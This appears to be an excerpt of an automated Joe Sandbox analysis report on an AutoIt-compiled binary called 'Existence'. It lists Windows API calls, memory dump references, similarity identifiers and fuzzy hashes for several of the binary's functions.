                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                          • API String ID: 2910397461-517079104
                                                                                                                                                                                          • Opcode ID: 3a170d668080d8a63c6e7008cc961dfa6dfc85e0405ac3df5c7fe50cc3d5d551
                                                                                                                                                                                          • Instruction ID: 819a1d174e265015913b4f35d02c2f23e9cac871ea06c69e5ac41fb3ea5bb0b4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a170d668080d8a63c6e7008cc961dfa6dfc85e0405ac3df5c7fe50cc3d5d551
                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B15271A40205AFEB24DFA8CC49FAE7BB9FB48710F018119F915E72A1D7B8AD40CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007A5532
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,007CDC30,?,\\.\,007CDCD0), ref: 007A560F
                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,007CDC30,?,\\.\,007CDCD0), ref: 007A577B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                                          • Opcode ID: 80103d8e60054201a11e8b82a5de75ab4446660ff063f4e859e2014b90ad9461
                                                                                                                                                                                          • Instruction ID: 5c8831fc1ba0ef5cf5ae1f410faddd376d2d67b9b732d163330b5447872f0dd4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80103d8e60054201a11e8b82a5de75ab4446660ff063f4e859e2014b90ad9461
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1561D170B04A09DBC72CDF24C995D7873B1EF96760B648229E506AB392C73DDD01DB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007C1BC4
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007C1BD9
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007C1BE0
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C1C35
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 007C1C55
                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007C1C89
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C1CA7
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007C1CB9
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 007C1CCE
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 007C1CE1
                                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 007C1D3D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007C1D58
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007C1D6C
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 007C1D84
                                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 007C1DAA
                                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 007C1DC4
                                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 007C1DDB
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 007C1E46
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                                          • Opcode ID: 55260d150edf0a81bf96809905687de7c1e365c755e6a517b392158b5e6c4d89
                                                                                                                                                                                          • Instruction ID: e15162ca13e31d4f7b15073e0d5c9e4543e813ba820328801d983f0986ce302e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55260d150edf0a81bf96809905687de7c1e365c755e6a517b392158b5e6c4d89
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9B15A71604301AFD714DF64C988F6ABBE5EF85350F40892CF599AB292D735EC44CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007C0D81
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C0DBB
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C0E25
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C0E8D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C0F11
                                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007C0F61
                                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007C0FA0
                                                                                                                                                                                            • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
                                                                                                                                                                                            • Part of subcall function 00792B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00792BA5
                                                                                                                                                                                            • Part of subcall function 00792B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00792BD7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                                          • Opcode ID: e979e80c33094add8818a3063f5b70530baafc9b634686e347dcf9ba645f4a12
                                                                                                                                                                                          • Instruction ID: c8d30bd515c2e687c4d184542990b78e9eefd0fdc6ec6bec08b7fc84072bd0c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e979e80c33094add8818a3063f5b70530baafc9b634686e347dcf9ba645f4a12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE1AD31208241CFCB14EF24C551E6AB3E6BF85314F55496CF8969B3A2DB38ED45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007325F8
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00732600
                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0073262B
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00732633
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00732658
                                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00732675
                                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00732685
                                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007326B8
                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007326CC
                                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 007326EA
                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00732706
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00732711
                                                                                                                                                                                            • Part of subcall function 007319CD: GetCursorPos.USER32(?), ref: 007319E1
                                                                                                                                                                                            • Part of subcall function 007319CD: ScreenToClient.USER32(00000000,?), ref: 007319FE
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000001), ref: 00731A23
                                                                                                                                                                                            • Part of subcall function 007319CD: GetAsyncKeyState.USER32(00000002), ref: 00731A3D
                                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0073199C), ref: 00732738
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                                                          • Opcode ID: 4d87a91b3cd7c6c61e23844c7e670f16abcf31d3f0044cb4e3404c92a1d8895c
                                                                                                                                                                                          • Instruction ID: 8c3598925e54f18462126c64f608553933530eb686a8027a9fc9b4405902bf92
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d87a91b3cd7c6c61e23844c7e670f16abcf31d3f0044cb4e3404c92a1d8895c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73B16B31A002099FDF14DFA8DC49FAE7BB4FB48314F108229FA19A7291D7B8A951CF55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
                                                                                                                                                                                            • Part of subcall function 00791A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
                                                                                                                                                                                            • Part of subcall function 00791A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
                                                                                                                                                                                            • Part of subcall function 00791A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00791741
                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00791775
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0079178C
                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 007917C6
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007917E2
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 007917F9
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00791801
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00791808
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00791829
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00791830
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079185F
                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00791881
                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00791893
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918BA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918C1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918CA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918D1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007918DA
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918E1
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007918ED
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007918F4
                                                                                                                                                                                            • Part of subcall function 00791ADF: GetProcessHeap.KERNEL32(00000008,007914FD,?,00000000,?,007914FD,?), ref: 00791AED
                                                                                                                                                                                            • Part of subcall function 00791ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007914FD,?), ref: 00791AF4
                                                                                                                                                                                            • Part of subcall function 00791ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007914FD,?), ref: 00791B03
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                          • Opcode ID: c64b1fcc60c75819056766429b2b30a5bf05a8b061c431bbe28fc46cd172ce64
                                                                                                                                                                                          • Instruction ID: 62e730e2d4d4214d9252b2cf9cb2c163a12bee11560e24db5ec6d2eca966e490
                                                                                                                                                                                          • Opcode Fuzzy Hash: c64b1fcc60c75819056766429b2b30a5bf05a8b061c431bbe28fc46cd172ce64
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62714EB2D0020AAFDF20DFA5EC49FAEBBB9BF04310F558129E915A6190D7399D15CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BCF1D
                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,007CDCD0,00000000,?,00000000,?,?), ref: 007BCFA4
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 007BD004
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BD054
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BD0CF
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 007BD112
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 007BD221
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 007BD2AD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007BD2E1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BD2EE
                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 007BD3C0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                                          • Opcode ID: f727eda500c25cf40111dde45c03a983cf9ecd3fd8b2460d9031f329556f98f8
                                                                                                                                                                                          • Instruction ID: 41a9b47938c540a9c2a57196e064c11c6ac8e98f985b1e96c496ce8e5824eca2
                                                                                                                                                                                          • Opcode Fuzzy Hash: f727eda500c25cf40111dde45c03a983cf9ecd3fd8b2460d9031f329556f98f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2123875604201DFD724DF14C885B6AB7E5BF88714F04889CF99A9B3A2DB39ED41CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007C1462
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C149D
                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C14F0
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C1526
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C15A2
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C161D
                                                                                                                                                                                            • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
                                                                                                                                                                                            • Part of subcall function 00793535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00793547
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                                          • Opcode ID: 2cfc2ce59ac19282091e4e1842c9357cb7f5917a8b10325c91e2fd6e946a743f
                                                                                                                                                                                          • Instruction ID: 04ea90e47e21a3fc97b2730a5e1b61839a76585ab5ffc32d4965e4ddd9e54830
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfc2ce59ac19282091e4e1842c9357cb7f5917a8b10325c91e2fd6e946a743f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12E1AD71608341CFCB14DF24C450A6AB7E2BF99314F55896CF8969B3A2DB38ED45CB82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                          • Opcode ID: 59175e9004c60af368cef844b582283675ebe159f8230e9f27bec0f2623d2310
                                                                                                                                                                                          • Instruction ID: d5f30400c370fe507bee9d923b1d15faea7601b142cfc078290b179f23cde600
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59175e9004c60af368cef844b582283675ebe159f8230e9f27bec0f2623d2310
                                                                                                                                                                                          • Instruction Fuzzy Hash: D471D33260016A8BCB309F78C9547FA33A1AF60798B250128FC569B295FA3DDD5587A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DB5
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DC9
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8DEC
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C8E0F
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007C8E4D
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007C6691), ref: 007C8EA9
                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007C8EE2
                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007C8F25
                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007C8F5C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 007C8F68
                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007C8F78
                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,007C6691), ref: 007C8F87
                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007C8FA4
                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007C8FB0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                          • API String ID: 799131459-1154884017
